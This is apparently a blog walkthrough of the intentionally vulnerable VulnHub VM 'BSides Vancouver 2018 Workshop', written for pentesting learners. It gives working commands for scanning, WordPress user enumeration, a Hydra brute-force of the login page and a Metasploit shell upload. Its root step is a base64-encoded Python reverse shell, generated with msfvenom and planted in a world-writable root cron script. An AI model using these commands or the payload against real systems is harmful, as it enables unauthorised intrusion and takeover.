Name: BSides Vancouver: 2018 (Workshop)
Date release: 21 Mar 2018
Author: abatchy
Series: BSides Vancouver
Web page: https://www.abatchy.com/projects
Vulnhub: https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/
Description:
Boot2root challenges aim to create a safe environment where you can perform real-world penetration testing on an (intentionally) vulnerable target.
This workshop will provide you with a custom-made VM where the goal is to obtain root level access on it.
This is a great chance for people who want to get into pentesting but don’t know where to start. *
If this sounds intimidating, don’t worry! During the workshop, we’ll be discussing various methodologies, common pitfalls and useful tools at every step of our pentest.
Requirements:
- Laptop capable of running two VMs and has a USB port.
- At least 20GB of free space.
- VirtualBox pre-installed.
- Kali VM
- Some familiarity with CLI.
1. Service Enumeration
Using the following nmap command:
nmap -O -A -sT -sV -p- -T5 192.168.1.39 -vvv
We find out there are 3 services running: FTP, SSH, and a web service:
2. FTP Enumeration
The service is setup to allow for anonymous authentication with access to view a folder called "public". Using my web browser, I can view the public directory:
Inside the public directory we find a back up of a text file called users.txt.bk
3. Web Enumeration
I ran a number of different scans against the web service. Some of these tools included nikto, dirb, and dirbuster.
For this exercise, just showing the nikto output I feel is sufficient since the rest is just overkill.
So here was the Nikto command and scan results:
Nikto ended up finding a robots.txt file that had a disallow entry for /backup_wordpress
At this point we know there is a wordpress on that site. Loading up the wpscan tool with the following command:
wpscan -u http://192.168.1.39/backup_wordpress --enumerate u --enumerate p --enumerate t
We got the following interesting output:
[+] Enumerating usernames ...
[+] Identified the following 2 user/s:
+----+-------+------+
| Id | Login | Name |
+----+-------+------+
| 1 | admin | admi |
| 2 | john | joh |
+----+-------+------+
[!] Default first WordPress username 'admin' is still used
So between Wordpress and this users backup file we found on the FTP service, it appears we should probably look to find the user credentials for john.
Using THC Hydra a password brute forcing tool, we were able to obtain john's password. The following hydra command was used to do so:
hydra -l john -P /root/Desktop/rockyou.txt 192.168.1.39 -V http-post-form '/backup_wordpress/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' -t 25
Breaking down the above command:
-l john
- specify target user is john
-P /root/Desktop/rockyou.txt
- Load the rockyou password file
-V
- Verbose mode
http-post-form
- The supported service. HTTP POST attack
/backup_wordpress/wp-login.php:
- Target URI to the login page
log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1
- The text field inputs for username and password on Wordpress login form. Substituting variables for hydra from above
S=Location
- Success criteria. Basically grep's the page for "location" if found it was a successful login
-t 25
- Make 25 connection attempts. Anything higher on this VM and it breaks (trial and error)
So the scan took about 11 minutes to find the password of enigma which was on line #2531 of the rockyou.txt file:
The rockyou file is a dictionary of passwords which was dumped from a major website related to video games back in the day.
4. Establish Foothold
Loading up the metasploit framework console, I used the following exploit:
use exploit/unix/webapp/wp_admin_shell_upload
Then set my options
After setting all the necessary options, simply type run to kick off the exploit. After entering run you should be presented with a meterpreter shell:
And now we have a shell running under the web service:
5. Privilege Escalation
After digging around on the machine for sometime, I found the crontab owned by root was world readable.
So root has this cleanup script that runs basically every second based on numerous leading asteriks which denotes when it should run. The cleanup script has world read,write, execute permissions (777):
I proceeded to download this script from the meterpreter shell:
The contents of the script:
#!/bin/sh
rm -rf /var/log/apache2/* # Clean those damn logs!!
Using msfvenom we will replace the contents of the cleanup script with a python reverse shell using the following command:
msfvenom -p cmd/unix/reverse_python lhost=192.168.1.29 lport=8888
msfvenom will then output a chunk of code that will be our reverse python shell:
I replaced the command previously in the cleanup script with the above python code at the bottom. Here it is for your reference:
python -c "exec('aW1wb3J0IHNvY2tldCAgICAsIHN1YnByb2Nlc3MgICAgLCBvcyAgOyAgICAgICAgIGhvc3Q9IjE5Mi4xNjguMS4yOSIgIDsgICAgICAgICBwb3J0PTg4ODggIDsgICAgICAgICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAgLCBzb2NrZXQuU09DS19TVFJFQU0pICA7ICAgICAgICAgcy5jb25uZWN0KChob3N0ICAgICwgcG9ydCkpICA7ICAgICAgICAgb3MuZHVwMihzLmZpbGVubygpICAgICwgMCkgIDsgICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgLCAxKSAgOyAgICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAsIDIpICA7ICAgICAgICAgcD1zdWJwcm9jZXNzLmNhbGwoIi9iaW4vYmFzaCIp'.decode('base64'))"
After editing in my payload, I upload the script back to the server in my meterpreter shell:
Then on my Kali system I create a netcat listener on port 8888 using
nc -lvp 8888
After a brief moment, I receive the reverse root shell as expected:
In the /root directory there is a flag.txt file which basically says congrats you obtained root. It also says there were numerous other ways to obtain root, did you find them?
There you have it!
Feel free to ask some questions should you have any. I will do my best to explain given that I would consider myself still to be a novice at penetration testing.
Please follow me if you are interested for future walk throughs as I intend to post more!